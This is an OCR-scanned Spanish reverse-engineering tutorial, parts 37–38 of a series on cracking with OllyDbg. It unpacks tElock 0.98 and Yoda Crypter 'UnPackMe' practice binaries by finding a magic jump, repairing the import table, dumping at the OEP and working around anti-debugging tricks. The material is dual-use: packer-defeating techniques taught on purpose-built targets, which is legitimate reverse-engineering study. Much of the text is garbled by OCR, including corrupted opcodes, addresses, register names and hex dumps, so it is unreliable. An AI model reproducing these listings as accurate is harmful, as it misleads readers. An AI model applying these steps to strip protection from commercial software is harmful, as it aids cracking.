0 ¡la 0F84 46FFFFFF | JE BB4662E7 UnPackMe. 004662E7 
5 6302 ADD EAX, EDX 


0385 4E034000 | ADD EAX, DWORD PTR SS: [EBP+40D34E] 
8B18 MOV _EBX, DWORD _PTR DS: [EAXI 


F7C3 DoB00BSO | TEST EBX, 20000000 
y 74 B6 JE SHORT 80466383 UnPackMe. 00466389 


3120 booaBBsa | AND DWORD PTR DS: C[EAX], 900000 
SB7E 10 MOU EDI,DWORD PTR DS: [ESI+10] 
a3FA ADD EDI, EDXx 
] 2095 DECC4000 | AND BYTE PTR SS: [EBP+40CCD6],0FF 
vBF84 30019000 | JE 004664FB UnPackMe. 004664FB 
| [86495 D7CC4000 | AND BYTE PTR SS: [EBP+40CCD7],0FF 
v| BF34 23010000 | JE B64664FE UnPackMe. B004664FB 


39BD S5AD44066 |MOU OWORD PTR SS: [EBP+46D45A],EDI 
3685 52044000 |MO0U EAX. DWORD PTR SS: [EBP+40D452] 


a3FA ADD EDI 
8695 DECC4008 | AND ByTE PTR SS: [EBP+40CCD6],0FF 

v BFS4 30010000 | JE BU4664FB UnPackMe. 004664FB 
AND_BYTE PTR SS: [EBP+49CCD7],0FF 
JE M04664FB 


E 
o 


UnPackMe. B04664FE 
MOU DWORD PTR SS: CEBP+40D45A],EDI 
MOU EAX, DWORD PTR SS: [EBP+40D452] 
TN En 
2885 52044000 mou ER, DIORO PTR SS: [EBP+40D452] 
z v/BF84 10010000 JE 004664FE UnPackMe. 004664FB 
BL | 148 DEC EAX 
0046 v| BF85 B2000000 | JNZ 0466484 UnPackMe. 004664A4 
0 S 


Or 


60 PUSHAD 
eBEr MOV ESI,EDI 


5 52044008 
19010990 
B2000090 


MOU EAX, DWORD PTR 55: CEBP+40D4521] 
INC_EAX 
DEC EAX 


PUSHAD 
MOU ESI,EDI 


A 


UnPackMe. B004664FB 
UnPackMe. 00466444 


En La LI le Ps! A pad | PP. .- SÁ l 


3890024 
FFS5 FECA400O 


FP FASNARaS 


MOVZX ECX, EVTE PTR_DS: LEAR] 
DEC DWORD PTR SS: [ESP] 
JLE SHORT M046648D 


INC ERX 
ADD EAX, ECX 


MOU DWORD PTR SS: [ESP],ECX 
INC DWORD PTR SS: CEBP+40CAFBJ 


MA MUARA ATA e POR ARANA? ar 


Esto es un miniloop luego de salir de el 


— Y — Y y KAY Y SY Y —— —_— ———S > € 2 E é Y A SS Ss 


UnPackMe. 004664BD 


UnPackMe. 004664B0 


¡£S] nie 


B3BD 4E034000 
F7C3 B00BBOSsO 
5A 6b 

75 _ÓF 

8D5C13 62 
S03B 00 

BF34 93000000 
EB 45 

FFO424 

66: 85DB 

BF34 25000000 
8B85 4A034000 
3B85_ 42044000 
Y5 2B 

S1E3 FFFFFF?F 
SBD: 

89D 4A034000 
8B43 3C 
28B4418 78 
B3sc1s 1C 
38B041A 

B385 4AD034000 
EB_13 

81E3 FFFFFF?F 
53 


FFES 4AD034000 
FE9S EOBA400B 


B3BD 4E0340006 
850B 

BF34 CrobB00a 
F7C3 B00BBBSsa 
5A 4n 

75 6F 

8D5c13 62 
£03B 00 

BFS4_ 93000000 
EB 45 


VIEW UCUUY  FIUQIIS> 


ADD EDI, DWORD PTR SS: CEBP+40034E ] 
TEST _EBX, EBX 


TEST EBXx, 350000000 
PUSH_O 


LEA EBX,DWORD_PTR_DS: A 
CMP BYTE PTR DS:[EBXJ, 


INC_DWORD PTR SS: [ESP] 
TEST _Bx,BX 


MOU EAX, DWORD PTR SS: CEBP+40034A] 


CcHaP Efid, DUORD PTR_SS: [EBP+40D442] 
AND EBX, ?EFFFFFF 
OU 


3 MOU EDX, EBX 
2801495 FCFFFFFILEA EDx,OWORD PTR DS: [EDx*4-4] 


EBX, DWORD PTR SS: ap 
EAX, DWORD PTR DS: LEBxX+3C 

EAX, DWORD PTR DS: CEANIEBR+78] 
EBX, DWORD PTR DS: CEAX+EBx+1C] 
EAX, DWORD PTR DS: CEDX+EBX] 
EAX, DWORD _PTR_SS: CEBP+40034A7 


AND EBX, PFFFFFFF 
PUSH EBX 
PUSH DWORD PTR SS: [EBP+40034A] 


TNF FOYw 


VAS IS AS Y E E E E OS A JS ES ES E E E 


ADD_EDI, DWORD PTR SS: [EBP+40D034E ] 
TEST EBX,EBX 


TEST EBX, 80000000 
PUSH_6 


LEA EBxX, DWORD _PTR_DS: [EBX+EDX+2] 
CMP BYTE PTR DS: CEBXJ1,0 


INC_ DWORD PTR SS: [ESP] 
TEST_Bx,BX 


PLD! IS VI IIA IS 


UnPackMe. B64665D9 


UnPackMe. 00466522 


UnPackMe. 60466583 
UnPackMe. 60466567 


UnPackMe. 60466583 


UnPackMe. 00466567 


UnPackMe. B0046657A 


UnPackMe. 00466506 


UnPackMe. 00466522 


UnPackMe. B04665B3 
UnPackMe. 00466567 


63BD 4E034066 [ADD EDI, DWORD PTR SS: [EBP+46034E ] 


A A AAA Ma El 


1 


25DB 
BF34 Cro0BB00a 


75 uF 
8D5C13 02 


66:85DB 
BFS4 25000000 


TEST _EBX, EBX 
F7C3 0000B0Ss6 | TEST EBx, S9B0BBBa 
5A 4b PUSH_O 


JNZ SHORT M0466522 
LEA EBX, DWORD_PTR_DS: CEBX+EDX+2] 
CMP BYTE _PTR DS: [EBXJ,0 


EEE DWORD PTR SS: [ESP] 


EST_BX,BX 


3B35 4AD034900 |MOU EAX, DWORD PTR SS: [EBP+40D34A] 


3885 42044000 |C 
81E3 FFFFFF?F | AND EBX, 7FFFFFFF 


MP EAX, DWORD PTR_SS: [EBP+40D442] 


UnPackMe. 00466508 


UnPackMe. 00466522 


UnPackMe. 064665B3 
UnPackMe. 00466567 


UnPackMe. 004665B3 


UnPackMe. 00466567 


O A A —Y —s SY TY —=y Y A Y Y A Y SY Y A Y SS SS Pd E E |] 


BF34 93000000 UnPackMe. 004665B3 


UnPackMe. 00466567 
INC_ DWORD PTR SS: [ESP] 

: TEST _Bx,BX 
BF34 25000000 UnPackMe. 004665B3 
38B35 4AD34008 |MOU EAX, DWORD PTR SS: [EBP+40D34A] 
3B85 42044000 |CMP EAX, DWORD PTR_SS: [EBP+40D442] 


75 28 
81E3 FFFFFF?F EBX, EFFFFFF 
8BD3 MOU EDX, EBX 

8D1495 FCFFFFFÍ LEA EDX, DWORD PTR DS: [EDX*4-4] 

£B90 4034000 EBX, DWORO PTR SS: CEBP+40034A] 

8B43 30 MOU EAX, DWORO PTR DS: [EBX+30] 
8B4418 78 EAX, DWORO PTR DS: CEAX+EBX+78] 
635c18 1C EBX, DWORO PTR DS: CEAX+EBX+1C] 


28B041A EAX, DWORD PTR DS: CEDX+EBX] 
6385 4AD034000 EAX, DWORD _PTR SS: [EBP+40034A] 


EB_13 

S1E3 FFFFFF?F [AND EBX, ?FFFFFFF 

53 PUSH EBX 

FFES 4A034000 | PUSH DWORD PTR SS: [EBP+40034A] 
A EOBA400B 


UnPackMe. 00466567 


UnPackMe. 0046657A 


kerne 132, GetProcAddress 


. ?E 22 lnD=raleMoa ARAALLODt 


Alli ya llega a GetProcAddress y luego salta donde lo guarda 


S1E3 FFFFFF7F | AND EBX,7FFFFFFF 
53 PUSH EBX 

FFES 4AD34900 [PUSH DWORD PTR SS: CEBP+40034A] 
FF95 EOBA4O000 

40 INC EAX 


48 DEC EAX 
75 33 «JNZ SHORT 0084665B1 UnPackhe. 00466581 
58 POP EAX 

F9 sTC 
9FS2 S1FDFFFF | JB 0046627 Uipackte. am4662E7 
47 INC EDI 


pur, 


y 


al +] Ljejmjtiwu]c]7[x]8/R]-]s/ 52] 


DWORD PTR DS: [EDIJ,EAX kernel32,CreateDirectoryA 


UnPackMe. 00466504 


Fs 
66:8943 FE MOU WORD PTR DS: [EBx-2],A2x 
8303 E Eo PTR DS: [EBX], AL 


43 
39803 CMP BYTE_PTR DS: [EBxXJ],AL 


75 F9 UnPackMe. 004665BD 
8385 4ED34900 1 ADD DWORD PTR SS: CEBP+40D34E],4 

ES BAFDFFFF JMP B046638A UnPackMe. B046638A 
8306 14 ADD ESI,14 


Alli lo guarda este es un traceo completo para una entrada mala, mirando los saltos condicionales 
como funcionan en ese caso, ahora llegaremos el OEP y buscaremos una entrada buena para hacer 
el mismo trabajo y comparar. 


Llego al OEP 


$ 


a a E y a a o o a a 


Sl y 
no -- 


Mi: iv. 
. 


And 
- 


0 E 1 OT 


atada 


30 Er 


O DA 
YE o o o o o o E o o 


r: 


JE WSPRWOP HPA 
PP PH 
TEME TS, e e 


ss áat.3.”.3.3.3. 


Como entrada buena elegimos 460BAC, ahora realizamos el mismo proceso que hicimos con la 


mala. 


Reiniciamos y la buscamos antes de ejecutar el programa. 


HU BYIE Pl 
ADD BvyTE PT 


vta1744*_E3s0 1 sii 
Gméxir LO 19 JONfT PI 
úeFORA TS o lry ro 

3Ik/BkuH+Gio£ibs 
C| TARAF*E-SE-ntElA 


Ahora ponemos un MEMORY BREAKPOINT ON WRITE para tratar de interceptar el momento 
en que el packer guarda la entrada buena. 


44%] 20) v395 $143 91 3 M5 0940 Y) 20 5 Bl 


PTR DS: [EDIJ,ERX 


MOU DWORD 
POP ERx 
DEC_ERX 
INC EAX 


CcLC 

MOU WORD PTR DS: [EBX-2], AX 
MOU BYTE PTR DS: [EBX],AL 
TN. FAX 


UnPackl 


Y0F4C3B 
ECx 7C929REB ntdll.7C929AEB 
EDX 7C98C0D8 ntdll.7C98C0D8 
EBX B00BBBa? 

ESP 0B12FFAD 

EBP 4BaSs995E 

ESI 0046500C UnPackMe. B046890C 
EDI 604650BAC UnPackMe. BO4ÉBBAC 


EIP 004665B1 UnPackMe.004665B1 


CO ES 9023 32bit BLFFFFFFFF) 
PO CS 0018 32bit DLFFFFFFFF) 
A Y $5 0923 S2bit OLFEFFFEFE) 


Vemos que EAX tiene el valor de una posible api aunque aun no dice el nombre, pero si miramos 
con GOTO EXPRESSION -EAX 


Enter expression to follow 


NOP 


NOP 

MOU EDI,EDI 

PUSH Hs 

MOU EBP,E 

MOU_EAX, DUORO PTR SS: [EBP+8] 
TEST EAX, EAX 


MOU EAX, DWORD PTR DS: [EAX-4] 
SHR EAX, 1 
POP EBP 


NOP 
NOP 


Man 


Vemos que nos lleva alli, y al volver al codigo magia aparecio el nombre jeje. 


A OLEAUT32 
YC929REB ntdll.7 
7C98C0D8 ntdll.?7 

[lalalala [5]5]5y4 
SP 0B12FFAD 

' ABASIISE 
604658900 UnPackMe. 
BB46BBAC UnPa 


' BO4665B1 UnPack 


E 0023 32bit BÍFFFFFFFF) 
bit DUFFFFFFFF) 
bit OLFFFFFFFF) 


SysStringLen 
AE 


D120 mm mmmmmmmmis 


Ahora vamos a hacer el mismo trabajo que hicimos con la entrada mala, esperemos que siga en 
orden y que la siguiente sea buena tambien si no deberemos seguir hasta que trabaje con una buena. 


PARA ENTRADAS BUENAS 


Llegamos hasta el inicio del loop y comenzamos a tracear. 


EU a acia Y) TT JJ TT FF y y Pp | 


SE 62094000 | MOU EDX, DWORD PTR SS: [EBP+400362] UnPackMe. B0400008 
MOU_EAX, DWORD PTR DS: [ESI] 
TEST _EAX, EAX 


MOU_EAX, Ai PTR DS: [ESI+10] 
TEST _EAX,El 


UnPackMe. 604663A1 


a UnPackMe. 604662E7 
12] ADD EAX, EDx 

15] ADD EAX, DWORD PTR SS: CEBP+40034E] 

a MOU EBX, DWORD PTR DS: CEAXI 

15] TEST EBX 20000000 

a UnPackMe. 604663B9 


AND DWORD PTR DS: [EAX], 35000006B 
MOU EDI,DWORD PTR DS: [ESI+10] 
ADD EDI, EDX 

AND_EYTE PTR SS: [EBP+40CC06],0FF 


AND_BYTE PTR SS: [EBP+40CCD7],0FF 
JE B04664FB 


MOU DWORD PTR SS: [TEBP+40D45A1,EDI 
As OS PTR SS: [EBP+40D452] 


y € 


UnPackMe. 164664 


DEC EAX 


UnPackM 


DI 


MOU EDxX, DWORD PTR SS: [EBP+400362] 
MOU_EAX, DWORD PTR DS: [ESI] 
TEST_EAX,EAX 


MOU_EAX, DWORD PTR DS: [ESI+10] 
TEST ad 


ADD EAX, El 
ADD EAX. DUÓRD PTR SS: [EBP+40034E] 


UnPackMe. 66466341 


UnPackMe. 6004662E7 


HOW. EGAs DWURD FIAR US LEHAJ 


TEST EBX, 350009000 


AND DWORD PTR DS: [EAX], 350000006 
MOV EDI, al PTR DS: [ESI+10] 
ADD EDI, EDx 

AND BYTE PTR 55: [EBP+40CCD6].BFF 


UnPackMe. 004663B9 


B 
B 
B 


Este en las entradas malas no saltaba pero es un salto muy pequeño no creo que sea desicivo, 
sigamos. 


10 TIUV EUA) UWURL FIAR UDILEDITIOS 
ADD EDI, EDX 
DECC4606 [AND BYTE PTR SS: [EBP+46CCD6],0FF 


30010000 
DrCC4006 [AND BYTE PTR SS: [EBP+40CCD7],6FF 
230109000 
5AD44000 [| MOU DWORD PTR SS: [EBP+40D45A7,EDI 
52044000 |MOU EAX, DWORD PTR SS: [EBP+40D452] 


5 EDICEDE" 1Un rr ra ra 
DECC4006 [AND BYTE PTR SS: [EBP+40CCD6],5FF 


30010000 | JE 1004664FB UnPackMe. D04664FB 
D7CC4000 Ma BYTE PTR SS: [EBP+40CCD7],0FF 
23019000 | JE 004664FB UnPackMe. 004664FB 


5AD440006 [MOU DWORD PTR SS: CEBP+40045A7,EDI 
52044000 |MOU EAXx, DWORD PTR SS: [EBP+40D452] 


INC EAX 
10010000 | JE 004664FB UnPackMe. 004664FB 
DEC EAX 
B2000000 | JNZ B64664A4 UnPackMe. D04664A4 
PUSHAD 


MA Ar mr 


aquí vemos una gran diferencia este salto en las entradas malas no saltaba y aca si y vemos que el 
codigo que salta es mucho. 


Deccaou0 | AND BYTE PTR SS: CEBP+40CCD6],0FF 
30010000 
D?7CC4000 Ez BYTE PTR SS: CEBP+40CCD7],0FF 
23010000 | JE 004664FB 
398D 5AD44009 |MOU DWORD PTR SS: CEBP+40045A],EDI 
2885 52044900 |MOU EAX, DWORD PTR SS: CEBP+40D452] 
0FS4 10010000 


43 
BFS5 B2000000 


had 


DE 
DOS 


ado 


Y 


= 
Tí 
D 


co 
[nn] 
— 
y 
fa y 
Q 
= 
m 
10] 
— 
m 
| 
Lal 


Mod 


100] 
co 
o 
110] 
+ 
o 
o 


Dala 
DO 
=y 00 
no 
E] 
ma 
E] 
o 
Le 
—. 
= 4 
o 
m 
D 
xXx 


CHP DWORD PTR DS: [EDIJ,O 
LEA EDI,DWORD PTR_DS: [EDI+4] 


48 DEC_EAX 
0F34 EcooBBBa | JE MB45664F3 
SBD8 MOU EBX, EAX 
6BCa 31 IMUL EAX,EAX, 31 


5A 64 PUSH 4 
== 00100000 PUSH 1000 


15) 


Dí 


5 
DI 


PUSH EAX 
6A 00 PUSH 6 

FF95 ECBA4B0A | CALL DWORD PTR SS: CEBP+4BBAECJ 
esco TEST EAX, EAX 

0F34 CFOBBOBO | JE MAIES4FS 

SBFE MOU EDI,ESI 

£BCE MOU ECX, EBX 

SBF8 MOU EDI, EAX 

8985 56044000 |M0U DWORD PTR SS: [EBP+40D456],EAX 
SBCE MOU ECX, EBX 


DDD 
DOS 


od 


DO 


ga £BDB 29 IMUL_EBx,EBXx,29 

1515) | | 63DF ADD EBx, EDI 

Ba í 291c24 MOU DWORD _PTR SS: [ESP],EBX 
1515) AI [BO ES MOU AL,BBS 

Jaja » 6A Ba PUSH 

a 3E| | 59 PUSH EAX 

a 3F| |53 PUSH EBX 

00466440| | BFB74424 BS MOUZX_EAX, WORD PTR SS: [ESP+8] 
06466445| | 59 PUSH_EAX 

60466445| |8D35 14BB4000 |LEA EAX,DWORD_PTR SS: [EBP+40BB14] 
0046644C| | BFB618 MOUZX EBX,BYTE PTR_DS: [EAX] 
0046644F| | FFAC24 DEC OWORD PTR SS: [ESP] 
00466452|w| 7E M9 JLE SHORT M046645D 

z HE 

O AO 


Alli vemos que es un salto bastante largo lo cual puede ser la diferencia de la desicion entre si una 
entrada se guardara buena o mala, o sea este si todo va como imaginamos seria el posible salto 
magico, un salto que decide si la entrada se guardara buena o mala, quiere decir que para que una 
entrada se guarde buena este salto debe saltar asi que una posibilidad seria hacerlo JMP. 


Pero ese salto no se encuentra en el inicio del programa debemos ser muy cuidadosos si reiniciamos 
el OLLYDBG y buscamos el salto 


a en] vis] sit] 1] > 1/ejmit][wjH/[c]/]x/B]R]...] s] 


SC 
3095 64EA3501 |X0R BYTE PTR SS: [EBP+135ER64], DL 
E6 D3 OUT 6D3,AL 
PUSHFD 

MOU ESP, 3C55992F 


BC 2F29553C 


Ararans mn 


PenAoacara 


UnPackMe. 00466348 


1/0 command 


Vemos que al inicio alli hay pura basura, asi que el packer creara ese salto mas adelante. 


El tema es como parar 
imaginacion. 


Pondremos un BPM ON WRITE que abarque a toda la IAT para que pare cuando guarda el primer 


valor. 


El inicio de la IAT era 460818 y el final 460f28 abarquemos toda esta zona con el BPM ON 


WRITE. 


ES 42786B5E 


Y Y Y — Y a a —= Y Y Y A A A Y Y AS 


7E CF 

3095 64ER3501 Backup 
se Copy 

BC 2F995530 Binary 

A2 9ESCDDEB 

82E9 27 Assemble 
3D 

3751 AS Label 

2D 

65:2F Comment 
ña 44 Breakpoint 
56 

2D 6183EFFE sue, Runtrace 
SE POP 

72 93 POP! New origin here 
8D55 C4 LEA 

Fa cLe Go to 
DABF3 


Br? 
C2 D39F 
nan 


Search for 
Find references 

View executable file 
Copy to executable file 
Go to 


w Hex 
Text 
Short 
Long 
Float 
Disassemble 
Special 


Ctrl+R 


> UnPa 
> 140 
» 

Space 

, Supe 
» UnPa 
» 

* Modi 

Ctrl+Gray UNPS 

» 


alli ya que HBP no acepta y BP los detecta asi que deberemos aguzar la 


Memory, on access 
, On write 


Memo 


Hardware, on access 
Hardware, on write 
Hardware, on execution 


X+501508 


Appearance 


IRIS MOMO ANDANDO A 


IRSA OA o DMmo A 


BO O-050<38fE 


> TORA SE. 


* 
ER TOS 
uño¡Bdzor +. EE Ia 
Gu a2o- lp bevós $ 

“IREWF1D1>;) 
Leite 
Aid > SUk yv 0er 


NAft=ari TV 


Alli esta toda la IAT con el BPP?PM ON WRITE ahora lleguemos adonde guarda el primer valor. 


de lc il la E caca 1) $ 1 4 $ y y $ | 


: AA STOS BYTE PTR ES: [EDI] 
46465092] 6902 ASBACOD4B | IMUL EDX,EDX, 4BCDBBAS 
a 5D F9 sTc 
a 72 62 JB SHORT 66465090 
a co 208 INT 20 
a c2 
É 


Di ROL EDXx, 1 
69DB 7O1FEESA | IMUL_EBX, EBX» GREE1F7O 
aonn tn 


nn EDwY 


UnP 


En los STOS para muchisimas veces ya que abarca toda la IAT el BPM, asi que miremos si en este 
momento ya esta visible el posible salto magico 


A A vis $00 9] DAMMAM ON AL 


ve 
898D 5AD44000 
> 52044000 


4 

v grs 10010090 

lol 0F8s B2000000 
60 


S8BF7 
2BCÓ0 


40 

833F 00 

| (8D7F_04 
lc 
43 

v| BFS4 ECOBOBDa 
2BD3 

£BCaO 31 


¿Nm Mñatanmaraa 


OPEP. 


90 
39BD S5AD44060 
3B85 52044000 


MOU DWORD PTR SS: [EBP+40045A],ED1 
Las EAX, DWORD PTR SS: CEBP+40D452] 


INC E 
CMP DWORD PTR DS: Sia 


B 
LEA roo, PTR ED1+4] 


DEC_EAX 


MOU EBX, EAX 
IMUL EAX,EAX,31 


Mii 1 araña 


as A 


NOP 
MOU DWORD PTR SS: [EBP+40D45A7, EDI 
MOU EAX» DWORD PTR SS: [EBP+40D452] 


UnPackMe. 004664FB 
UnPackMe. 004664A4 


UnPackMe. 004663F7 
UnPackMe. 004664F3 


UnPackMe. 064664FE 


Hay dos posibilidades que el packer detecte los cambios y que falle o que corra y llegue al OEP, 


demos RUN. 


Hou A ESP 

PUSH -1 

PUSH 450E60 
PUSH 


429208 
MOU EAX, DWORD PTR FS: [6] 
PUSH_EAX 


SH_EDI 
MOU DWORD_PTR SS: [EBP-18],ESP 
Z0OR EDX, EDX 


MOV DL, AH 
MOU DWORD _PTR DS: [45£634],EDXx 
MAU FAX. FAX 


Alli llegamos al OEP miremos la IAT 


Real entry point of SFX cod 


kerne 132. GetVersion 


3 
DG 00 00 06 06 S0 60 60 60 BO FA 6B DA 77 .......Lo... 
DA ER EB i 
00 698 DD 15 CS 53 2E BD C3 58 00 DO 00| ....1S+X.CEXo... 
EF 77 66 95 EF 77 89 6A EF 77 FS AD EF 77 EJ'ufo wej'msi'w 
EF 77 99 8B EF 77 CO EF 77 28 7D EF 772 Yui "whá"we?w 
EF 77 77 53 F2 77 1E C9 Fi 77 6C EC EF 77 8)"wwS=wáfr2w.% "1 
EF 77 FA 8D EF 77 F1 DD EF 77 51 B2 EF 77 RE'w: 1'w2i"w68'w 
EF 77 2A ES EF 77 SF 39 F2 77 71 B4 EF 77/2'"w*D'"w_9=4H4'w 
EEE 85 EF 77 D2 EF 77) .¿ "uba W03' WIFE” w 
a EF 77 FB EA FO 77 12 83 EF 77 01 72 FO 77 Cp"w0-uta'"wbBr-w 
FO 77 DS 93 EF 77 68 EF EF 77 D2 EF 77 04-4'5'"wh""waE'w 
EF 77 SF 38 F2 77 D6 ES EF 77 68 Eb EF 77 Bo"w?S-=w1b'"whóÓ"w 
EF 77 90 5B EF 77 6D AC EF 77 EC FO 77 .*"wEL* wma wó l-w 
EF 77 3D CS Fi 77 3D 6D FO 77 6F CO EF 77 "1"w="zw=m-wo*"w 
EF 77 26 D9 EF 77 FB SE EF 77 36 SA EF 77 3C'w8d'wt""y62'w 
EF 77 OF 62 EF 77 49 SE EF 77 97 5D EF 77 *e"web'wI""wuJ'w 
EF 77 6B FA EF 77 7B C9 FO 77 98 F2 77 + uk: "tir wrú=w 
F2 77 55 EA EF 77 CS 61 EF 77 70 E6 EF 77 +e=4U0"wta'wpp'w 
EF 77 2D 6C EF 77 98 6E EF 77 383 EF 77 -ú'w-L'wún"wD3'w 
EF 77 EB AA EF 77 26 69 FO 77 Bl 95 EF 27]. yr wi" él ao 
EF 77 8A SA EF 77 E9 49 F2 77 F1 FO 77 0'"wez”wu I=w8:2-w 
FO 77 51 Eb FO 77 33 8C EF 77 6C EC EF 77 [ri-W06-w31"wly"w 
EF 77 00 00 698 6B 17 88 7C C1 C9 80m 7C k$citIre: 
31 7C EE 1E 89 7C 8D 2C 81 7C YA 94 7C 1,ú¡Bz61 
81 7C A2 CA Si 7C 16 1E 80 7C 43 99 sa 7C “AC ¡CÓCi 
81 7C 29 29 Si 7C 14 9B 86 7C si 9A se 7C Nec iiúdEs 
82 7C AE 94 83 7C 2B 2E 83 7C C4 CE 89 7C +. 31101 
86 7C 3F DC 81 7C SF 48 81 7C 23 CC 81 7C Hi iaelri 
s1 7C 86 381 7C B9 8C 83 7c ñ4 sn 7C 1ISi0ñAC: 
BA 70 ?F N4 RA 71. 72 17 21 71. 92 M2 RA ?f. rhiliFC0! 


Todos valores correctos, jeje ya tenemos la IAT reparada, ahora dumpeemos, podiamos haberlo 
hecho antes no hay diferencia con esto. 


Options Window Help 
1 HideOD 
2 CommandBar » 
3 Puntos Mágicos 

4 +BP-OLLY 


[c] File View Debug 


CEEB Z 


Dump debuldbd process 


ADD ESP, -58 


ESO Find OEP by Section Hop (Trace into) 


ckMe_tElock0.98.exe 


Start Address: [400000 Size: E (1 
Entry Point: [668D6 > Modify: [271 B0 Get ElP as OEP | 


Base of Code: fi 000 Base of Data: [48000 


IV Fix Raw Size £ Difset of Dump Image 


| Section | Virtual Size_ | Virtual Offset | Raw Size | Raw.Olfset_| Characl 
teddy O004A0OO  ODOO1ODO 00044000 00001000 COODOC 
teddy 0000C00O 00048000 000OCODO  D004BO0O  COODOC 
teddy 00003000 00057000 000039000 00057000 COODOC 
teddy 00003000 0000000 00003000 0006000O OOO 
ste 00002000 ODOS3000 00002000 00063000 COODOC 
teddy 00004000 0DOG5000 00004000 DO0E500O  COODOC 


4 


[Rebuild Import 
(+ Methodl : Search JMP[*21] | CALL[API] in memory image 
C Method2 : Search DLL £4Pl name string in dumped file 


Le quito la tilde a REBUILD IMPORT. 


Y dumpeo, ahora abro el IMP REC y le pongo nuevamente los valores de RVA; SIZE Y OEP. 


- - Attach to an Active Process 
[c:idocuments and settingsvricardosescritoriounpackme_telock0.98.exe (OOOODE8C] M 


Imported Functions Found 


1 advapi32.dll FThunk:00060818 NbFunc:5 (decimal: 5] valid: YES 
'- comctl32. dll FT hunk:00060830 NbFunc:2 (decimal: 2] valid: YES 
|- adi32.dll FThunk:0006083C NbFunc:4D [decimal 77] valid YES 

kemel32. dll FThunk:00060974 NbFunc:8É [decimal:140) valid: YES = 
)- oleaut32. dll FThunk:00060B48 NbFunc:10 (decimal: 16] valid: YES 
shell32. dll FT hunk:O0060BEC NbFunc:3 [decimal:3] valid:YES 

- user32. dll FThunk:ODO60BFC NbFunc:43 (decimal:163] valid: YES 
> winrar. dll FT hunk:00060E8C NbFunc:1 [decimal:1] valid: YES 

|. winspool. dre FThunk:00060E 94 NbFunc:8 (decimal:8) valid:YES 


E e 


5 
1 


Veo que ahora sale todo valido, el salto magico hizo su magia jeje. 


Ahora reparo el dumpeado apretando FIX DUMP. 


Fixing a dumped file... 
C (decimal: 12] module(s] 

1839 (decimal: 441] imported function(s). 

** Ney section added successfully. RW4:00069000 S12E:00002000 
Image Import Descriptor size: FO: Total lenath: 1F1E 

CADocuments and SettinastRicardoE scritorio+dumped_.exe saved successfully. 


14 


[6] 


Alli lo guardo como dumped_.exe y lo ejecuto a ver si funciona. 


Coded by Teddy Rogers / SnD Team 2005 E 


P tElock 0,98 UnPackMe 


If you umpack it write a tutorial... :) 


Funciona perfecto jeje 


Bueno hemos visto un metodo para hallar el salto magico que siempre varia de un packer a otro, 
pero comparando y mirando un poco entre lo que hace con una entrada buena y una mala, siempre 
lo podemos llegar a ubicar facilmente, continuaremos con mas packers en la parte 38. 


hasta la parte 38 
Ricardo Narvaja 
22/03/06 


INTRODUCCION AL CRACKING CON OLLYDBG PARTE 38 


En la ultima entrega vimos nuestro primer programa con entradas redireccionadas y como 
repararlas y continuaremos levemente aumentando la dificultad de los packers para ir aumentando 
el nivel, asimismo, empezaremos con los ejercicios para que practiquen un poco. 


Aquí tenemos un unpackme de Yoda Crypter 1.3 para practicar un poco, por supuesto el 
OLLYDBG debe tener los plugins necesarios para no ser detectado por el antidebugging como 


vimos en partes anteriores. 


Aquí estamos en el Entry Point 


[LASA VZY_S MAIS Y IN A A E E E E E A SS 


55 PUSH_EBP 
ga465061 ES MOU EBP,ESP 


UnPackMe. 60465060 


60 

Es B000BB0a 

5D POP EBP 

S1ED 60284000 |SUB EBP, 402860 

B9 50344000 MOU ECx,48345D 

31E9 Có234000 | SUB ECx, 402806 
DS MOU EDx,EBP 


£8B 
3102 Có234000 |ADD EDx. 402806 


Vemos un PUSHAD funcionara? Probemos el metodo, lleguemos hasta alli traceando y pasemos 
con F7 el PUSHAD. 


Hacemos ESP-FOLLOW IN DUMP y luego marcamos los primeros 4 bytes como vimos 
anteriormente y colocamos un HARDWARE BPX ON ACCESS. 


B612FF94188 BD? 92 2. FE FE FE FE CA FE 12 AA Pd EF 12 00| 8»(! 


[Address [Hei dump___»»»IOO2O ler |] 


0O12FFE4 d 
GaL2FFDA| Ss As 54 COPY ' 
BB12FFE4|F3 99 83 Binary » 300 00 
» 
» 


0012FFF4/66 00 00 


Memory, on access 
Memory, on write 


Breakpoint 


Search for 

Follow DWORD in Disassembler 
Follow DWORD in Dump 

Goto » 


Hardware, on write 
Hardware, on execution 


vw Hex > 


Eprlaa lore a aca | $ Y J y) y y PI ft y" 


UnPackMe. 604659BE 


PUSH_EARX 

XOR EAX, EAX 

PUSH DWORD PTR_FS: CEAX] 
MOU DWORD PTR FS: [EAXJ],ESP 


UnPackMe. 00465982 


INT3 
ANA DUTE DTD NS.renva mi 


TALACALA 


araAcreaoo 


Vemos una rutina que creara un manejador de excepciones y luego como salta con un JMP a una 
zona de ceros para provocar un error, asi que si traceamos y llegamos al JMP. 


[c] File View Debug Plugins Options Window Help 


KEI In vie] $0] ul + 1jejmjtiwWu]c/,]k]B[r]»]s 


9 PUSH_ERX 
XOR EAX, EAX 
PUSH DWORD _PTR_FS: CEAX] 
MOU DWORD PTR FS: [EAX],ESP 


UnPackMe. 40465982 


INTS 

Eno BYTE PTR DS: [ERAXJ,AL 
ADD BYTE PTR DS: [EAXI,AL 

ADD BYTE PTR DS: [EAXJ. AL 


Alli va a saltar al error, miremos adonde saltara en el manejador de excepciones. 


Debug Plugins Options “4 


Log Alt+L 

Executable modules Alt+E 

Memory Alt+m 

Heap 

Threads 

Windows 

Handles 

cpu AltH+c 
: Patches +P 


¡AER A E EJ EJE SS EJ SST EJ 


Address |SE handler 


BO12FFAC UnPackMe. B046590B 
BB12FFEO| kernel 32. /CS399F3 


El mismo esta en 46590b, el que no quiere complicarse mucho la vida y llegar al OEP, aquí se 
puede poner un BPM ON ACCESS en la primera seccion y al pasar la excepcion llegaremos al 
00448000 | BOBACODO | UnPackMe| . 1 


OEP. 
Map |R R 
Imag RW Cop RWE 
00457000 | BaBasonÓ| UnPackMe|.d:  “ctualize 


60460000 | 00003090 | UnPackMe . i les in Di 

d04c=000 dona2a0s Unpackhte ES View in Disassembler Enter 
y NFackKMe/y ii 

00470000 | OBBASODA Dump in CPU 


D03F0000| 0BBO200B 
00490000 000810008 UnPackMe PE header 
0401000 00644060) UnPackMe .t 


00530000 | 00002000 Dump 
00540000) 00103000 
00650000 DOBFCOGO Search Ctrl+B 


00950000 | 00001000 
00900000 06BA300B 
B09E0000' DO0BB2000 
53C30000 | 00061006/ COMCTL3Z 
53031000) 000700006| COMCTL32|.+t 
53CA1000| 0900903090| COMCTL32 | .d 
53CA4000| 09001F090| COMCTL32| .r 
